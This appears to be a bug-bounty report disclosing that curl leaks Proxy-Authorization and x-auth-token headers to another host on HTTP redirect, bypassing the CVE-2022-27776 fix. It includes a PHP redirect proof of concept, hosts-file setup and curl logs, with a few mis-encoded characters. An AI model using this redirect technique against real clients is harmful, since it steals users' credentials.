[add summary of the vulnerability]
Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect , like the Proxy-Authorization ใx-auth-token header. It is a bypass of fix https://hackerone.com/reports/1547048 , CVE-2022-27776 .
[add details for how we can reproduce the issue]
<?php
header("Location: http://a.com:8000");
?>
Add the 2 record in the /etc/hosts file:
127.0.0.1 a.com
127.0.0.1 b.com
# curl -H "Proxy-Authorization: secrettoken" http://b.com/302.php -vv -L
* Trying 127.0.0.1:80...
* Connected to b.com (127.0.0.1) port 80 (#0)
> GET /302.php HTTP/1.1
> Host: b.com
> User-Agent: curl/7.83.1
> Accept: */*
> Proxy-Authorization: secrettoken
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 13 May 2022 11:22:06 GMT
< Server: Apache/2.4.6 (CentOS) PHP/5.4.16
< X-Powered-By: PHP/5.4.16
< Location: http://a.com:8000
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host b.com left intact
* Clear auth, redirects to port from 80 to 8000
* Issue another request to this URL: 'http://a.com:8000/'
* Trying 127.0.0.1:8000...
* Connected to a.com (127.0.0.1) port 8000 (#1)
> GET / HTTP/1.1
> Host: a.com:8000
> User-Agent: curl/7.83.1
> Accept: */*
> Proxy-Authorization: secrettoken
>
# curl -H "x-auth-token: secrettoken" http://b.com/302.php -vv -L
* Trying 127.0.0.1:80...
* Connected to b.com (127.0.0.1) port 80 (#0)
> GET /302.php HTTP/1.1
> Host: b.com
> User-Agent: curl/7.83.1
> Accept: */*
> x-auth-token: secrettoken
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 13 May 2022 11:24:15 GMT
< Server: Apache/2.4.6 (CentOS) PHP/5.4.16
< X-Powered-By: PHP/5.4.16
< Location: http://a.com:8000
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host b.com left intact
* Clear auth, redirects to port from 80 to 8000
* Issue another request to this URL: 'http://a.com:8000/'
* Trying 127.0.0.1:8000...
* Connected to a.com (127.0.0.1) port 8000 (#1)
> GET / HTTP/1.1
> Host: a.com:8000
> User-Agent: curl/7.83.1
> Accept: */*
> x-auth-token: secrettoken
The reason for the problem is that curlโs filtering of authentication header header is incomplete. The Proxy-Authorization and x-auth-token headers are not considered, only restrict the delivery of Cookies and Authorization.
[list any additional material (e.g. screenshots, logs, etc.)]
Leak of Proxy-Authorization and x-auth-token headers.